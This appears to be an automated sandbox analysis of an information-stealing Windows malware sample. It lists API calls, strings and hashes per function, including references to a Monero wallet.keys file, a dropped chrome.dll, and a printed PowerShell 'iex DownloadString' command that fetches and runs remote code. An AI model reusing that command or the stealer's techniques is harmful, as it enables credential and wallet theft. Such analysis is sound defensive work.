                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 828f5e9ef5e69c1dcc69ee4aaceaa229b586866de0f6233e15c59bcc14624ec0
                                      • Instruction ID: ca5a4a47daa24b87dea1da6a40488a793cd72859fa095c80b305b660e73a8961
                                      • Opcode Fuzzy Hash: 828f5e9ef5e69c1dcc69ee4aaceaa229b586866de0f6233e15c59bcc14624ec0
                                      • Instruction Fuzzy Hash: 2241ED71D102289BDB14EFA0E8A2BEDB779AF24300F804559F11677192EF742A59CF51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: 77a38214509637941a9ca8ac3328bd6d7e7c24535d754cda2e7afea8894516f9
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: 60219D72D00628AFDB21BF69CC41A6F7A79EB91BA4F064119F909A7211C3308F418FF0
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00126C0C
                                      • sscanf.NTDLL ref: 00126C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00126C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00126C60
                                      • ExitProcess.KERNEL32 ref: 00126C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: cca95a9a1834adcb9d757ebf4805bc34392410ec207f91fa56cd0f13f68467a1
                                      • Instruction ID: ff8e92cac5060a2e065565512deae47e43a271adbdc9b4fae50d5d707f319eab
                                      • Opcode Fuzzy Hash: cca95a9a1834adcb9d757ebf4805bc34392410ec207f91fa56cd0f13f68467a1
                                      • Instruction Fuzzy Hash: E821ED75D0425C9BCF15EFE4E9459EEB7B9BF48300F048629E506B7290EB349614CB64
                                      APIs
                                      • StrStrA.SHLWAPI(00E3F710,00000000,00000000,?,00119F71,00000000,00E3F710,00000000), ref: 001293FC
                                      • lstrcpyn.KERNEL32(003E7580,00E3F710,00E3F710,?,00119F71,00000000,00E3F710), ref: 00129420
                                      • lstrlen.KERNEL32(00000000,?,00119F71,00000000,00E3F710), ref: 00129437
                                      • wsprintfA.USER32 ref: 00129457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: ef1107a821a6a6da801f14a989fa9db5bf4543a5f6ee25f04e378036e9bc3e9a
                                      • Instruction ID: bf57650dd31d6b6339056e393fe2a70d9102eae56f5b9c71af08678e9dfcafe9
                                      • Opcode Fuzzy Hash: ef1107a821a6a6da801f14a989fa9db5bf4543a5f6ee25f04e378036e9bc3e9a
                                      • Instruction Fuzzy Hash: 52011E7650424CFFDB05DFA8D994EEE7B78EB48304F108258F9099B280D731AA50DB90
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001112B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001112BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001112D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001112F5
                                      • RegCloseKey.ADVAPI32(?), ref: 001112FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 14f5c19ece4095b209725f62aad22c7b396a4b8bb6b8be0dfeba2391920aea50
                                      • Instruction ID: 014acc766eb5fe613f6b17f679e29251bbb2837cc8494d8a6714fb4190103e70
                                      • Opcode Fuzzy Hash: 14f5c19ece4095b209725f62aad22c7b396a4b8bb6b8be0dfeba2391920aea50
                                      • Instruction Fuzzy Hash: 5301CD79A44309BBDB14DFD4DC89FAEB77CAB48701F104699FB059B2C0D770AA408B90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: f6e1f0b8e6236b9c5be82db6efa2ff3b65369c14ebabdb35c1c0bc480e60319b
                                      • Instruction ID: c78a94a7e382e4af198d9901be4618d8fb76bc7b98d5f61353ad0bfbefb23cf2
                                      • Opcode Fuzzy Hash: f6e1f0b8e6236b9c5be82db6efa2ff3b65369c14ebabdb35c1c0bc480e60319b
                                      • Instruction Fuzzy Hash: A341F5B01007AC5FDB218B24EC85FFB7BE89B45704F1444A8EA8A96182D3719A649FA0
                                      APIs
                                      • GetEnvironmentVariableA.KERNEL32(00E39100,003E7D88,0000FFFF), ref: 0011A7ED
                                      • LoadLibraryA.KERNEL32(00E26298), ref: 0011A876
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AB30: lstrlen.KERNEL32(00114F55,?,?,00114F55,00130DDF), ref: 0012AB3B
                                        • Part of subcall function 0012AB30: lstrcpy.KERNEL32(00130DDF,00000000), ref: 0012AB95
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • SetEnvironmentVariableA.KERNEL32(00E39100,00000000,00000000,?,0013137C,?,?,003E7D88,00130B0A), ref: 0011A862
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                      • String ID:
                                      • API String ID: 2929475105-2740779761
                                      • Opcode ID: 15561a40c159f78e5706a811f3cd8ba4c3fdf467b63fef59105888a180e03fc1
                                      • Instruction ID: b27162b6e368cfbde6d57781694ae2218a51ab411221fbfab30e486b2a7b936e
                                      • Opcode Fuzzy Hash: 15561a40c159f78e5706a811f3cd8ba4c3fdf467b63fef59105888a180e03fc1
                                      • Instruction Fuzzy Hash: 38411F719142449FC72AEBA4FC96BEE37B9BF18305F404628F505AB2E1E7305D98CB61
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00126903
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 001269C6
                                      • ExitProcess.KERNEL32 ref: 001269F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: a006dd08f1cdb64f299d729772a86a22f3c5b6596bea84a87573896b346a6263
                                      • Instruction ID: 697cc5b8d7cdd7cc56889b6cea29849496478af442c77922bd11126b2b9f9ae3
                                      • Opcode Fuzzy Hash: a006dd08f1cdb64f299d729772a86a22f3c5b6596bea84a87573896b346a6263
                                      • Instruction Fuzzy Hash: DD312AB1901228ABDB15EB90ED92FDEB77CAF68300F804189F20576191DF706B58CF69
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00130E10,00000000,?), ref: 001289BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001289C6
                                      • wsprintfA.USER32 ref: 001289E0
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: 73828a05f65f246205d55ac878d0ca24d8fd8002903b15eb4a1d6c94710fc502
                                      • Instruction ID: 173d48467841460e866e6ce3d8dbfa8a68942d0fc53823664b2594fcc7478e8c
                                      • Opcode Fuzzy Hash: 73828a05f65f246205d55ac878d0ca24d8fd8002903b15eb4a1d6c94710fc502
                                      • Instruction Fuzzy Hash: 85213DB1A44248EFDB14DF94DD85FAEBBB8FB48711F104619FA15AB2C0C775A9008BA0
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0011A098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: 1a29378c0d021ac9b3a6566097e759cccf022a79b53db1b73d08c741b5eaa30a
                                      • Instruction ID: de6bd488b7503e6afacb9acf7bb24893457d889e64f18fac2aeef4cbef38d2e0
                                      • Opcode Fuzzy Hash: 1a29378c0d021ac9b3a6566097e759cccf022a79b53db1b73d08c741b5eaa30a
                                      • Instruction Fuzzy Hash: A6F0307068D280BFD727EB61ED88B9636ADE705714F500625F5159B1D0C3795CC8CB52
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001296AE,00000000), ref: 00128EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00128EF2
                                      • wsprintfW.USER32 ref: 00128F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 6493fed43e136d2919b97430259eda7eb5732b43f13a01f26eaa51e684f3aea9
                                      • Instruction ID: 37809b23c3c0f0cabd65e2237f7ac680e1070937dd27ae685bc8b70fff7233fb
                                      • Opcode Fuzzy Hash: 6493fed43e136d2919b97430259eda7eb5732b43f13a01f26eaa51e684f3aea9
                                      • Instruction Fuzzy Hash: 18E0EC75A48349FBDB21DBD4DD4AE6D77BCEB09702F000694FE099B380DA719E109B91
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0011AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 0011ADEC
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011AE73
